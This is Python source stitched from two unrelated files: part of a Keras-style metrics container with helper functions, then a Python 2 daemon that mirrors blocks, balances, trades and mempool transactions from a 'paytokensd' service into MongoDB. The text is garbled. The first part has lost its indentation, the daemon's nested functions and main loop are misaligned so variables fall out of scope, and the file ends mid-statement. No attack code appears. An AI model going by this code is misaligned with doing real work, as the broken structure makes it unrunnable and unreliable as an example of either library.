is_multi_output = len(self._output_names) > 1
zip_args = (self._output_names, self._metrics, self._weighted_metrics)
for output_name, output_metrics, weighted_output_metrics in zip(*zip_args):
for m in output_metrics:
if m is None:
continue
if is_multi_output:
m._name = output_name + '_' + m._name
if m._name in metric_names:
raise ValueError('Found two metrics with the same name: {}'.format(
m._name))
metric_names.add(m._name)
for wm in weighted_output_metrics:
if wm is None:
continue
if is_multi_output:
if output_name + '_' + wm._name in metric_names:
wm._name = output_name + '_weighted_' + wm._name
else:
wm._name = output_name + '_' + wm._name
elif wm._name in metric_names:
wm._name = 'weighted_' + wm._name
if wm._name in metric_names:
raise ValueError('Found two metrics with the same name: {}'.format(
wm._name))
metric_names.add(wm._name)
# pylint: enable=protected-access
def _create_ordered_metrics(self):
"""Cache the flat order needed when returning metrics, for backwards compat."""
self._metrics_in_order = []
for output_metrics, output_weighted_metrics in zip(self._metrics,
self._weighted_metrics):
for m in nest.flatten(output_metrics):
if m is not None:
self._metrics_in_order.append(m)
for wm in nest.flatten(output_weighted_metrics):
if wm is not None:
self._metrics_in_order.append(wm)
def update_state(self, y_true, y_pred, sample_weight=None):
"""Updates the state of per-output metrics."""
y_true = self._conform_to_outputs(y_pred, y_true)
sample_weight = self._conform_to_outputs(y_pred, sample_weight)
if not self._built:
self.build(y_pred, y_true)
y_pred = nest.flatten(y_pred)
y_true = nest.flatten(y_true) if y_true is not None else []
sample_weight = nest.flatten(sample_weight)
zip_args = (y_true, y_pred, sample_weight, self._metrics,
self._weighted_metrics)
for y_t, y_p, sw, metric_objs, weighted_metric_objs in zip(*zip_args):
# Ok to have no metrics for an output.
if (y_t is None or (all(m is None for m in metric_objs) and
all(wm is None for wm in weighted_metric_objs))):
continue
y_t, y_p, sw = match_dtype_and_rank(y_t, y_p, sw)
mask = get_mask(y_p)
sw = apply_mask(y_p, sw, mask)
for metric_obj in metric_objs:
if metric_obj is None:
continue
metric_obj.update_state(y_t, y_p, sample_weight=mask)
for weighted_metric_obj in weighted_metric_objs:
if weighted_metric_obj is None:
continue
weighted_metric_obj.update_state(y_t, y_p, sample_weight=sw)
def reset_states(self):
"""Resets the state of all `Metric`s in this container."""
if self._built:
metrics = self._metrics_in_order
else:
# If the user supplied `Metric` objects directly, we should
# reset those. This could also contain `str`s or `function`s
# though.
metrics = nest.flatten(self._user_metrics) + nest.flatten(
self._user_weighted_metrics)
for metric_obj in metrics:
if isinstance(metric_obj, metrics_mod.Metric):
metric_obj.reset_states()
def _get_metric_objects(self, metrics, y_t, y_p):
"""Convert user-supplied metrics to `Metric` objects."""
metrics = nest.flatten(metrics)
return [self._get_metric_object(m, y_t, y_p) for m in metrics]
def _get_metric_object(self, metric, y_t, y_p):
    """Converts user-supplied metric to a `Metric` object.

    Args:
      metric: A string, function, or `Metric` object.
      y_t: Sample of label.
      y_p: Sample of output.

    Returns:
      A `Metric` object, or `None` when `metric` is `None`.

    Raises:
      ValueError: If `metric` is a callable whose name cannot be determined.
    """
    if metric is None:
        return None  # Ok to have no metric for an output.

    # Convenience feature for selecting b/t binary, categorical,
    # and sparse categorical.
    if metric not in ['accuracy', 'acc', 'crossentropy', 'ce']:
        metric_obj = metrics_mod.get(metric)
    else:
        # Resolve the generic name using the ranks/last dims of a sample
        # label and prediction.
        y_t_rank = len(y_t.shape.as_list())
        y_p_rank = len(y_p.shape.as_list())
        y_t_last_dim = y_t.shape.as_list()[-1]
        y_p_last_dim = y_p.shape.as_list()[-1]

        is_binary = y_p_last_dim == 1
        # Sparse labels: lower rank than predictions, or a trailing dim of
        # 1 against multi-class predictions.
        is_sparse_categorical = (
            y_t_rank < y_p_rank or y_t_last_dim == 1 and y_p_last_dim > 1)

        if metric in ['accuracy', 'acc']:
            if is_binary:
                metric_obj = metrics_mod.binary_accuracy
            elif is_sparse_categorical:
                metric_obj = metrics_mod.sparse_categorical_accuracy
            else:
                metric_obj = metrics_mod.categorical_accuracy
        else:
            if is_binary:
                metric_obj = metrics_mod.binary_crossentropy
            elif is_sparse_categorical:
                metric_obj = metrics_mod.sparse_categorical_crossentropy
            else:
                metric_obj = metrics_mod.categorical_crossentropy

    # Allow a `Loss` used as a metric to average over the batch.
    if isinstance(metric_obj, losses_mod.Loss):
        metric_obj._allow_sum_over_batch_size = True  # pylint: disable=protected-access

    if not isinstance(metric_obj, metrics_mod.Metric):
        if isinstance(metric, six.string_types):
            metric_name = metric
        else:
            metric_name = get_custom_object_name(metric)
            if metric_name is None:
                raise ValueError(
                    'Metric should be a callable, found: {}'.format(metric))

        # Wrap plain functions/losses so they track a running mean.
        metric_obj = metrics_mod.MeanMetricWrapper(metric_obj, name=metric_name)

    return metric_obj
def _should_broadcast(self, obj):
    """Returns True if `obj` should be applied to every Model output.

    A single metric (e.g. 'mse') broadcasts, and so does a flat list of
    metrics (e.g. ['mse', 'mae']); deeper nesting is treated as a
    per-output specification.
    """
    if nest.is_nested(obj):
        return (isinstance(obj, (list, tuple)) and
                all(not nest.is_nested(element) for element in obj))
    # e.g. 'mse'.
    return True
def _copy_object(self, obj):
    """Returns a fresh copy of a `Metric`; passes anything else through."""
    if not isinstance(obj, metrics_mod.Metric):
        return obj  # Strings, functions and `None` are stateless.
    return obj.__class__.from_config(obj.get_config())
def create_pseudo_output_names(outputs):
    """Generates default ('output_1', ...) names for a subclassed Model's outputs."""
    return _create_pseudo_names(outputs, prefix='output_')
def create_pseudo_input_names(inputs):
    """Generates default ('input_1', ...) names for a subclassed Model's inputs."""
    return _create_pseudo_names(inputs, prefix='input_')
def _create_pseudo_names(tensors, prefix):
    """Creates pseudo {input | output} names for subclassed Models.

    Warning: this function should only be used to define default
    names for `Metrics` and `SavedModel`. No other use cases should
    rely on a `Model`'s input or output names.

    Example with dict:
    `{'a': [x1, x2], 'b': x3}` becomes:
    `['a_1', 'a_2', 'b']`

    Example with list:
    `[x, y]` becomes:
    `['output_1', 'output_2']`

    Args:
      tensors: `Model`'s outputs or inputs.
      prefix: 'output_' for outputs, 'input_' for inputs.

    Returns:
      Flattened list of pseudo names.
    """

    def shift_to_one_based(element):
        # Use "output_1" rather than "output_0" for the first position.
        return element + 1 if isinstance(element, int) else element

    paths = nest.map_structure(shift_to_one_based,
                               list(nest.yield_flat_paths(tensors)))

    names = []
    for path in paths:
        if path:
            name = '_'.join(str(part) for part in path)
            # Purely positional paths (lists/tuples) get the prefix;
            # dict keys already carry a meaningful name.
            if isinstance(path[0], int):
                name = prefix + name
        else:
            name = prefix + '1'  # Single input/output.
        names.append(name)
    return names
def map_to_output_names(y_pred, output_names, struct):
    """Maps a dict to a list using `output_names` as keys.

    This is a convenience feature only. When a `Model`'s outputs
    are a list, you can specify per-output losses and metrics as
    a dict, where the keys are the output names. If you specify
    per-output losses and metrics via the same structure as the
    `Model`'s outputs (recommended), no mapping is performed.

    For the Functional API, the output names are the names of the
    last layer of each output. For the Subclass API, the output names
    are determined by `create_pseudo_output_names` (For example:
    `['output_1', 'output_2']` for a list of outputs).

    This mapping preserves backwards compatibility for `compile` and
    `fit`.

    Args:
      y_pred: Sample outputs of the Model, to determine if this convenience
        feature should be applied (`struct` is returned unmodified if `y_pred`
        isn't a flat list).
      output_names: List. The names of the outputs of the Model.
      struct: The structure to map.

    Returns:
      `struct` mapped to a list in same order as `output_names`.
    """
    is_single = not nest.is_nested(y_pred)
    is_flat_list = (not is_single and
                    isinstance(y_pred, (list, tuple)) and
                    all(not nest.is_nested(y_p) for y_p in y_pred))

    # Only remap a dict `struct` onto a single output or a flat output list.
    if not isinstance(struct, dict) or not (is_single or is_flat_list):
        return struct

    names = output_names or create_pseudo_output_names(y_pred)
    remaining = copy.copy(struct)
    mapped = [remaining.pop(name, None) for name in names]
    if remaining:
        raise ValueError('Found unexpected keys that do not correspond '
                         'to any Model output: {}. Expected: {}'.format(
                             remaining.keys(), names))
    return mapped[0] if len(mapped) == 1 else mapped
def map_missing_dict_keys(y_pred, struct):
    """Replaces missing dict keys in `struct` with `None` placeholders.

    Mutates and returns `struct` when both arguments are dicts; otherwise
    returns `struct` untouched.
    """
    if isinstance(y_pred, dict) and isinstance(struct, dict):
        for key in y_pred:
            struct.setdefault(key, None)
    return struct
def match_dtype_and_rank(y_t, y_p, sw):
    """Match dtype and rank of predictions.

    Args:
      y_t: Label tensor.
      y_p: Prediction tensor; supplies the reference rank and dtype.
      sw: Sample-weight tensor, or `None`.

    Returns:
      Tuple `(y_t, y_p, sw)` where `y_t`/`sw` gain a trailing axis when
      `y_p` is rank 2, and are cast to `y_p`'s dtype as described below.
    """
    # Rank: add a trailing axis so e.g. shape-(N,) labels/weights line up
    # with (N, 1) predictions.
    if y_t.shape.rank == 1 and y_p.shape.rank == 2:
        y_t = array_ops.expand_dims_v2(y_t, axis=-1)
    if sw is not None:
        if sw.shape.rank == 1 and y_p.shape.rank == 2:
            sw = array_ops.expand_dims_v2(sw, axis=-1)

    # Dtype.
    # This is required mainly for custom loss functions which do not take care
    # casting dtypes.
    # Only cast within the same numeric family (float->float, int->int) to
    # avoid silently truncating e.g. float labels against int predictions.
    if ((y_t.dtype.is_floating and y_p.dtype.is_floating) or
            (y_t.dtype.is_integer and y_p.dtype.is_integer)):
        y_t = math_ops.cast(y_t, y_p.dtype)

    if sw is not None:
        sw = math_ops.cast(sw, y_p.dtype)
    return y_t, y_p, sw
def get_mask(y_p):
    """Returns the Keras mask attached to `y_p`, or `None` when unset."""
    mask = getattr(y_p, '_keras_mask', None)
    return mask
def apply_mask(y_p, sw, mask):
    """Applies any mask on predictions to sample weights.

    Args:
      y_p: Prediction tensor; supplies the dtype for the mask.
      sw: Sample-weight tensor, or `None`.
      mask: Keras mask tensor, or `None`.

    Returns:
      `sw` with the mask multiplied in, the mask itself when `sw` is
      `None`, or the original `sw` when there is no mask.
    """
    if mask is not None:
        mask = math_ops.cast(mask, y_p.dtype)
        if sw is not None:
            # Align mask/sample-weight ranks before combining them.
            mask, _, sw = (
                losses_utils.squeeze_or_expand_dimensions(mask, sample_weight=sw))
            sw *= mask
        else:
            # No explicit weights: the mask becomes the sample weight.
            sw = mask
    return sw
def get_custom_object_name(obj):
    """Returns the name to use for a custom loss or metric callable.

    Args:
      obj: Custom loss or metric callable.

    Returns:
      Name to use, or `None` if the object was not recognized.
    """
    if hasattr(obj, 'name'):
        # `Loss`/`Metric`-style instances carry an explicit name.
        return obj.name
    if hasattr(obj, '__name__'):
        # Plain functions.
        return obj.__name__
    if hasattr(obj, '__class__'):
        # Callable class instances: derive a snake_case name.
        return generic_utils.to_snake_case(obj.__class__.__name__)
    # Unrecognized object (in practice unreachable: everything has
    # `__class__`).
    return None
| |
"""
blockfeed: sync with and process new blocks from paytokensd
"""
import re
import os
import sys
import json
import copy
import logging
import datetime
import decimal
import ConfigParser
import time
import pymongo
import gevent
from lib import config, util, events, blockchain, util_jetcoin
from lib.components import assets, betting
D = decimal.Decimal
def process_cpd_blockfeed(zmq_publisher_eventfeed):
    """Main blockfeed loop: keeps mongo state in sync with paytokensd.

    Polls paytokensd for new blocks/messages, mirrors them into mongo
    (trades, balance changes, tracked assets, transaction stats, ...) and
    republishes each message on the supplied ZMQ event-feed socket.

    Args:
        zmq_publisher_eventfeed: ZMQ socket used to push decorated message
            events out to listening clients (via send_json).
    """
    # Sentinel "no blocks processed yet" record.
    LATEST_BLOCK_INIT = {'block_index': config.BLOCK_FIRST, 'block_time': None, 'block_hash': None}
    mongo_db = config.mongo_db
def blow_away_db():
    """boom! blow away all applicable collections in mongo.

    Drops every collection this daemon derives from the blockfeed and
    reinitializes app_config and the seed tracked assets. Returns the
    fresh app_config document.
    """
    mongo_db.processed_blocks.drop()
    mongo_db.tracked_assets.drop()
    mongo_db.trades.drop()
    mongo_db.balance_changes.drop()
    mongo_db.asset_market_info.drop()
    mongo_db.asset_marketcap_history.drop()
    mongo_db.pair_market_info.drop()
    mongo_db.jet_open_orders.drop()
    mongo_db.asset_extended_info.drop()
    mongo_db.transaction_stats.drop()
    mongo_db.feeds.drop()
    mongo_db.wallet_stats.drop()

    #create/update default app_config object
    mongo_db.app_config.update({}, {
        'db_version': config.DB_VERSION, #payblockd database version
        'running_testnet': config.TESTNET,
        'paytokensd_db_version_major': None,
        'paytokensd_db_version_minor': None,
        'paytokensd_running_testnet': None,
        'last_block_assets_compiled': config.BLOCK_FIRST, #for asset data compilation in events.py (resets on reparse as well)
    }, upsert=True)
    app_config = mongo_db.app_config.find()[0]

    #DO NOT DELETE preferences and chat_handles and chat_history

    #create XPT and JET assets in tracked_assets
    for asset in [config.XPT, config.JET]:
        base_asset = {
            'asset': asset,
            'owner': None,
            'divisible': True,
            'locked': False,
            'total_issued': None,
            '_at_block': config.BLOCK_FIRST, #the block ID this asset is current for
            '_history': [] #to allow for block rollbacks
        }
        mongo_db.tracked_assets.insert(base_asset)

    #reinitialize some internal counters
    config.CURRENT_BLOCK_INDEX = 0
    config.LAST_MESSAGE_INDEX = -1

    return app_config
def prune_my_stale_blocks(max_block_index):
    """Removes all records for blocks higher than max_block_index.

    Called when there are records for blocks higher than this in the
    database -- they were partially created and we should get rid of them.
    Returns the processed-block record for max_block_index (or the
    LATEST_BLOCK_INIT sentinel if none exists).

    NOTE: after calling this function, you should always trigger a "continue"
    statement to reiterate the processing loop (which will get a new
    last_processed_block from paytokensd and resume as appropriate)
    """
    logging.warn("Pruning to block %i ..." % (max_block_index))
    mongo_db.processed_blocks.remove({"block_index": {"$gt": max_block_index}})
    mongo_db.balance_changes.remove({"block_index": {"$gt": max_block_index}})
    mongo_db.trades.remove({"block_index": {"$gt": max_block_index}})
    mongo_db.asset_marketcap_history.remove({"block_index": {"$gt": max_block_index}})
    mongo_db.transaction_stats.remove({"block_index": {"$gt": max_block_index}})

    #to roll back the state of the tracked asset, dive into the history object for each asset that has
    # been updated on or after the block that we are pruning back to
    assets_to_prune = mongo_db.tracked_assets.find({'_at_block': {"$gt": max_block_index}})
    for asset in assets_to_prune:
        logging.info("Pruning asset %s (last modified @ block %i, pruning to state at block %i)" % (
            asset['asset'], asset['_at_block'], max_block_index))
        prev_ver = None
        # Walk backwards through the asset's saved versions until one
        # recorded at or before max_block_index is found.
        while len(asset['_history']):
            prev_ver = asset['_history'].pop()
            if prev_ver['_at_block'] <= max_block_index:
                break
        if prev_ver:
            if prev_ver['_at_block'] > max_block_index:
                #even the first history version is newer than max_block_index.
                #in this case, just remove the asset tracking record itself
                mongo_db.tracked_assets.remove({'asset': asset['asset']})
            else:
                #if here, we were able to find a previous version that was saved at or before max_block_index
                # (which should be prev_ver ... restore asset's values to its values
                prev_ver['_id'] = asset['_id']
                prev_ver['_history'] = asset['_history']
                mongo_db.tracked_assets.save(prev_ver)

    config.CAUGHT_UP = False
    latest_block = mongo_db.processed_blocks.find_one({"block_index": max_block_index}) or LATEST_BLOCK_INIT
    return latest_block
def publish_mempool_tx():
    """Fetches new txs from the paytokensd mempool, stores them in mongo and
    publishes each previously-unseen one on the ZMQ event feed."""
    tx_hashes = []
    mempool_txs = mongo_db.mempool.find(fields={'tx_hash': True})
    for mempool_tx in mempool_txs:
        tx_hashes.append(str(mempool_tx['tx_hash']))

    # Exclude txs we have already stored; only pull categories we surface.
    params = None
    if len(tx_hashes) > 0:
        params = {
            'filters': [
                {'field':'tx_hash', 'op': 'NOT IN', 'value': tx_hashes},
                {'field':'category', 'op': 'IN', 'value': ['sends', 'jetpays', 'issuances', 'dividends', 'callbacks']}
            ],
            'filterop': 'AND'
        }
    new_txs = util.call_jsonrpc_api("get_mempool", params, abort_on_error=True)

    for new_tx in new_txs['result']:
        tx = {
            'tx_hash': new_tx['tx_hash'],
            'command': new_tx['command'],
            'category': new_tx['category'],
            'bindings': new_tx['bindings'],
            'timestamp': new_tx['timestamp'],
            'viewed_in_block': config.CURRENT_BLOCK_INDEX
        }
        mongo_db.mempool.insert(tx)
        # insert() adds a mongo '_id' to the dict; strip it before
        # publishing, then decorate with feed-only fields.
        del(tx['_id'])
        tx['_category'] = tx['category']
        tx['_message_index'] = 'mempool'
        logging.debug("Spotted mempool tx: %s" % tx)
        zmq_publisher_eventfeed.send_json(tx)
def clean_mempool_tx():
    """clean mempool transactions older than MAX_REORG_NUM_BLOCKS blocks"""
    mongo_db.mempool.remove({"viewed_in_block": {"$lt": config.CURRENT_BLOCK_INDEX - config.MAX_REORG_NUM_BLOCKS}})
config.CURRENT_BLOCK_INDEX = 0 #initialize (last processed block index -- i.e. currently active block)
config.LAST_MESSAGE_INDEX = -1 #initialize (last processed message index)
config.BLOCKCHAIN_SERVICE_LAST_BLOCK = 0 #simply for printing/alerting purposes
config.CAUGHT_UP_STARTED_EVENTS = False
#^ set after we are caught up and start up the recurring events that depend on us being caught up with the blockchain

#grab our stored preferences, and rebuild the database if necessary
app_config = mongo_db.app_config.find()
assert app_config.count() in [0, 1]
if ( app_config.count() == 0
     or config.REPARSE_FORCED
     or app_config[0]['db_version'] != config.DB_VERSION
     or app_config[0]['running_testnet'] != config.TESTNET):
    if app_config.count():
        logging.warn("payblockd database version UPDATED (from %i to %i) or testnet setting changed (from %s to %s), or REINIT forced (%s). REBUILDING FROM SCRATCH ..." % (
            app_config[0]['db_version'], config.DB_VERSION, app_config[0]['running_testnet'], config.TESTNET, config.REPARSE_FORCED))
    else:
        logging.warn("payblockd database app_config collection doesn't exist. BUILDING FROM SCRATCH...")
    app_config = blow_away_db()
    my_latest_block = LATEST_BLOCK_INIT
else:
    app_config = app_config[0]
    #get the last processed block out of mongo
    my_latest_block = mongo_db.processed_blocks.find_one(sort=[("block_index", pymongo.DESCENDING)]) or LATEST_BLOCK_INIT
    #remove any data we have for blocks higher than this (would happen if payblockd or mongo died
    # or errored out while processing a block)
    my_latest_block = prune_my_stale_blocks(my_latest_block['block_index'])

#start polling paytokensd for new blocks
while True:
    try:
        running_info = util.call_jsonrpc_api("get_running_info", abort_on_error=True)
        if 'result' not in running_info:
            raise AssertionError("Could not contact paytokensd")
        running_info = running_info['result']
    except Exception, e:
        logging.warn(str(e) + " -- Waiting 3 seconds before trying again...")
        time.sleep(3)
        continue

    if running_info['last_message_index'] == -1: #last_message_index not set yet (due to no messages in paytokensd DB yet)
        logging.warn("No last_message_index returned. Waiting until paytokensd has messages...")
        time.sleep(10)
        continue

    #wipe our state data if necessary, if paytokensd has moved on to a new DB version
    wipeState = False
    updatePrefs = False
    if app_config['paytokensd_db_version_major'] is None \
       or app_config['paytokensd_db_version_minor'] is None \
       or app_config['paytokensd_running_testnet'] is None:
        # First run against this backend: just record its version info.
        updatePrefs = True
    elif running_info['version_major'] != app_config['paytokensd_db_version_major']:
        logging.warn("paytokensd MAJOR DB version change (we built from %s, paytokensd is at %s). Wiping our state data." % (
            app_config['paytokensd_db_version_major'], running_info['version_major']))
        wipeState = True
        updatePrefs = True
    elif running_info['version_minor'] != app_config['paytokensd_db_version_minor']:
        logging.warn("paytokensd MINOR DB version change (we built from %s.%s, paytokensd is at %s.%s). Wiping our state data." % (
            app_config['paytokensd_db_version_major'], app_config['paytokensd_db_version_minor'],
            running_info['version_major'], running_info['version_minor']))
        wipeState = True
        updatePrefs = True
    elif running_info.get('running_testnet', False) != app_config['paytokensd_running_testnet']:
        logging.warn("paytokensd testnet setting change (from %s to %s). Wiping our state data." % (
            app_config['paytokensd_running_testnet'], running_info['running_testnet']))
        wipeState = True
        updatePrefs = True
    if wipeState:
        app_config = blow_away_db()
    if updatePrefs:
        app_config['paytokensd_db_version_major'] = running_info['version_major']
        app_config['paytokensd_db_version_minor'] = running_info['version_minor']
        app_config['paytokensd_running_testnet'] = running_info['running_testnet']
        mongo_db.app_config.update({}, app_config)
        #reset my latest block record
        my_latest_block = LATEST_BLOCK_INIT
        config.CAUGHT_UP = False #You've Come a Long Way, Baby

    #work up to what block paytokensd is at
    last_processed_block = running_info['last_block']

    if last_processed_block['block_index'] is None:
        logging.warn("paytokensd has no last processed block (probably is reparsing). Waiting 3 seconds before trying again...")
        time.sleep(3)
        continue

    if my_latest_block['block_index'] < last_processed_block['block_index']:
        #need to catch up
        config.CAUGHT_UP = False

        cur_block_index = my_latest_block['block_index'] + 1
        #get the blocktime for the next block we have to process
        try:
            cur_block = util.call_jsonrpc_api("get_block_info",
                {'block_index': cur_block_index}, abort_on_error=True)['result']
        except Exception, e:
            logging.warn(str(e) + " Waiting 3 seconds before trying again...")
            time.sleep(3)
            continue
        cur_block['block_time_obj'] = datetime.datetime.utcfromtimestamp(cur_block['block_time'])
        cur_block['block_time_str'] = cur_block['block_time_obj'].isoformat()

        try:
            block_data = util.call_jsonrpc_api("get_messages",
                {'block_index': cur_block_index}, abort_on_error=True)['result']
        except Exception, e:
            logging.warn(str(e) + " Waiting 5 seconds before trying again...")
            time.sleep(5)
            continue

        # clean api cache
        util.clean_block_cache(cur_block_index)

        #parse out response (list of txns, ordered as they appeared in the block)
        for msg in block_data:
            msg_data = json.loads(msg['bindings'])

            # Sanity check: messages are expected to arrive strictly in order.
            if msg['message_index'] != config.LAST_MESSAGE_INDEX + 1 and config.LAST_MESSAGE_INDEX != -1:
                logging.error("BUG: MESSAGE RECEIVED NOT WHAT WE EXPECTED. EXPECTED: %s, GOT: %s: %s (ALL MSGS IN get_messages PAYLOAD: %s)..." % (
                    config.LAST_MESSAGE_INDEX + 1, msg['message_index'], msg, [m['message_index'] for m in block_data]))
                #sys.exit(1) #FOR NOW

            #BUG: sometimes paytokensd seems to return OLD messages out of the message feed. deal with those
            if msg['message_index'] <= config.LAST_MESSAGE_INDEX:
                logging.warn("BUG: IGNORED old RAW message %s: %s ..." % (msg['message_index'], msg))
                continue

            logging.info("Received message %s: %s ..." % (msg['message_index'], msg))

            #don't process invalid messages, but do forward them along to clients
            status = msg_data.get('status', 'valid').lower()
            if status.startswith('invalid'):
                #(but don't forward along while we're catching up)
                if last_processed_block['block_index'] - my_latest_block['block_index'] < config.MAX_REORG_NUM_BLOCKS:
                    event = util.decorate_message_for_feed(msg, msg_data=msg_data)
                    zmq_publisher_eventfeed.send_json(event)
                config.LAST_MESSAGE_INDEX = msg['message_index']
                continue

            #track message types, for compiling of statistics
            if msg['command'] == 'insert' \
               and msg['category'] not in ["debits", "credits", "order_matches", "bet_matches",
                   "order_expirations", "bet_expirations", "order_match_expirations", "bet_match_expirations",
                   "rps_matches", "rps_expirations", "rps_match_expirations", "bet_match_resolutions"]:
                mongo_db.transaction_stats.insert({
                    'block_index': cur_block_index,
                    'block_time': cur_block['block_time_obj'],
                    'message_index': msg['message_index'],
                    'category': msg['category']
                })

            #HANDLE REORGS
            if msg['command'] == 'reorg':
                logging.warn("Blockchain reorginization at block %s" % msg_data['block_index'])
                #prune back to and including the specified message_index
                my_latest_block = prune_my_stale_blocks(msg_data['block_index'] - 1)
                config.CURRENT_BLOCK_INDEX = msg_data['block_index'] - 1

                #for the current last_message_index (which could have gone down after the reorg), query paytokensd
                running_info = util.call_jsonrpc_api("get_running_info", abort_on_error=True)['result']
                config.LAST_MESSAGE_INDEX = running_info['last_message_index']

                #send out the message to listening clients (but don't forward along while we're catching up)
                if last_processed_block['block_index'] - my_latest_block['block_index'] < config.MAX_REORG_NUM_BLOCKS:
                    msg_data['_last_message_index'] = config.LAST_MESSAGE_INDEX
                    event = util.decorate_message_for_feed(msg, msg_data=msg_data)
                    zmq_publisher_eventfeed.send_json(event)
                break #break out of inner loop

            #track assets
            if msg['category'] == 'issuances':
                assets.parse_issuance(mongo_db, msg_data, cur_block_index, cur_block)

            #track balance changes for each address
            bal_change = None
            if msg['category'] in ['credits', 'debits',]:
                actionName = 'credit' if msg['category'] == 'credits' else 'debit'
                address = msg_data['address']
                asset_info = mongo_db.tracked_assets.find_one({ 'asset': msg_data['asset'] })
                if asset_info is None:
                    logging.warn("Credit/debit of %s where asset ('%s') does not exist. Ignoring..." % (msg_data['quantity'], msg_data['asset']))
                    continue
                quantity = msg_data['quantity'] if msg['category'] == 'credits' else -msg_data['quantity']
                quantity_normalized = util_jetcoin.normalize_quantity(quantity, asset_info['divisible'])

                #look up the previous balance to go off of
                last_bal_change = mongo_db.balance_changes.find_one({
                    'address': address,
                    'asset': asset_info['asset']
                }, sort=[("block_index", pymongo.DESCENDING), ("_id", pymongo.DESCENDING)])

                if last_bal_change \
                   and last_bal_change['block_index'] == cur_block_index:
                    #modify this record, as we want at most one entry per block index for each (address, asset) pair
                    last_bal_change['quantity'] += quantity
                    last_bal_change['quantity_normalized'] += quantity_normalized
                    last_bal_change['new_balance'] += quantity
                    last_bal_change['new_balance_normalized'] += quantity_normalized
                    mongo_db.balance_changes.save(last_bal_change)
                    logging.info("Procesed %s bal change (UPDATED) from tx %s :: %s" % (actionName, msg['message_index'], last_bal_change))
                    bal_change = last_bal_change
                else: #new balance change record for this block
                    bal_change = {
                        'address': address,
                        'asset': asset_info['asset'],
                        'block_index': cur_block_index,
                        'block_time': cur_block['block_time_obj'],
                        'quantity': quantity,
                        'quantity_normalized': quantity_normalized,
                        'new_balance': last_bal_change['new_balance'] + quantity if last_bal_change else quantity,
                        'new_balance_normalized': last_bal_change['new_balance_normalized'] + quantity_normalized if last_bal_change else quantity_normalized,
                    }
                    mongo_db.balance_changes.insert(bal_change)
                    logging.info("Procesed %s bal change from tx %s :: %s" % (actionName, msg['message_index'], bal_change))

            #book trades
            if (msg['category'] == 'order_matches'
                and ((msg['command'] == 'update' and msg_data['status'] == 'completed') #for a trade with JET involved, but that is settled (completed)
                     or ('forward_asset' in msg_data and msg_data['forward_asset'] != config.JET and msg_data['backward_asset'] != config.JET))): #or for a trade without JET on either end

                if msg['command'] == 'update' and msg_data['status'] == 'completed':
                    #an order is being updated to a completed status (i.e. a JETpay has completed)
                    tx0_hash, tx1_hash = msg_data['order_match_id'][:64], msg_data['order_match_id'][64:]
                    #get the order_match this jetpay settles
                    order_match = util.call_jsonrpc_api("get_order_matches",
                        {'filters': [
                         {'field': 'tx0_hash', 'op': '==', 'value': tx0_hash},
                         {'field': 'tx1_hash', 'op': '==', 'value': tx1_hash}]
                        }, abort_on_error=True)['result'][0]
                else:
                    assert msg_data['status'] == 'completed' #should not enter a pending state for non JET matches
                    order_match = msg_data

                forward_asset_info = mongo_db.tracked_assets.find_one({'asset': order_match['forward_asset']})
                backward_asset_info = mongo_db.tracked_assets.find_one({'asset': order_match['backward_asset']})
                assert forward_asset_info and backward_asset_info
                base_asset, quote_asset = util.assets_to_asset_pair(order_match['forward_asset'], order_match['backward_asset'])

                #don't create trade records from order matches with JET that are under the dust limit
                if (order_match['forward_asset'] == config.JET and order_match['forward_quantity'] <= config.ORDER_JET_DUST_LIMIT_CUTOFF) \
                   or (order_match['backward_asset'] == config.JET and order_match['backward_quantity'] <= config.ORDER_JET_DUST_LIMIT_CUTOFF):
                    logging.debug("Order match %s ignored due to %s under dust limit." % (order_match['tx0_hash'] + order_match['tx1_hash'], config.JET))
                    continue

                #take divisible trade quantities to floating point
                forward_quantity = util_jetcoin.normalize_quantity(order_match['forward_quantity'], forward_asset_info['divisible'])
                backward_quantity = util_jetcoin.normalize_quantity(order_match['backward_quantity'], backward_asset_info['divisible'])

                #compose trade
                trade = {
                    'block_index': cur_block_index,
                    'block_time': cur_block['block_time_obj'],
                    'message_index': msg['message_index'], #secondary temporaral ordering off of when
                    'order_match_id': order_match['tx0_hash'] + order_match['tx1_hash'],
                    'order_match_tx0_index': order_match['tx0_index'],
                    'order_match_tx1_index': order_match['tx1_index'],
                    'order_match_tx0_address': order_match['tx0_address'],
                    'order_match_tx1_address': order_match['tx1_address'],
                    'base_asset': base_asset,
                    'quote_asset': quote_asset,
                    'base_quantity': order_match['forward_quantity'] if order_match['forward_asset'] == base_asset else order_match['backward_quantity'],
                    'quote_quantity': order_match['backward_quantity'] if order_match['forward_asset'] == base_asset else order_match['forward_quantity'],
                    'base_quantity_normalized': forward_quantity if order_match['forward_asset'] == base_asset else backward_quantity,
                    'quote_quantity_normalized': backward_quantity if order_match['forward_asset'] == base_asset else forward_quantity,
                }
                # Prices quantized to 8 decimal places, banker's rounding.
                trade['unit_price'] = float(
                    ( D(trade['quote_quantity_normalized']) / D(trade['base_quantity_normalized']) ).quantize(
                        D('.00000000'), rounding=decimal.ROUND_HALF_EVEN))
                trade['unit_price_inverse'] = float(
                    ( D(trade['base_quantity_normalized']) / D(trade['quote_quantity_normalized']) ).quantize(
                        D('.00000000'), rounding=decimal.ROUND_HALF_EVEN))

                mongo_db.trades.insert(trade)
                logging.info("Procesed Trade from tx %s :: %s" % (msg['message_index'], trade))

            #broadcast
            if msg['category'] == 'broadcasts':
                betting.parse_broadcast(mongo_db, msg_data)

            #if we're catching up beyond MAX_REORG_NUM_BLOCKS blocks out, make sure not to send out any socket.io
            # events, as to not flood on a resync (as we may give a 525 to kick the logged in clients out, but we
            # can't guarantee that the socket.io connection will always be severed as well??)
            if last_processed_block['block_index'] - my_latest_block['block_index'] < config.MAX_REORG_NUM_BLOCKS:
                #send out the message to listening clients
                event = util.decorate_message_for_feed(msg, msg_data=msg_data)
                zmq_publisher_eventfeed.send_json(event)

            #this is the last processed message index
            config.LAST_MESSAGE_INDEX = msg['message_index']

        #block successfully processed, track this in our DB
        new_block = {
            'block_index': cur_block_index,
            'block_time': cur_block['block_time_obj'],
            'block_hash': cur_block['block_hash'],
        }
        mongo_db.processed_blocks.insert(new_block)
        my_latest_block = new_block
        config.CURRENT_BLOCK_INDEX = cur_block_index

        #get the current blockchain service block
        if config.BLOCKCHAIN_SERVICE_LAST_BLOCK == 0 or config.BLOCKCHAIN_SERVICE_LAST_BLOCK - config.CURRENT_BLOCK_INDEX < config.MAX_REORG_NUM_BLOCKS:
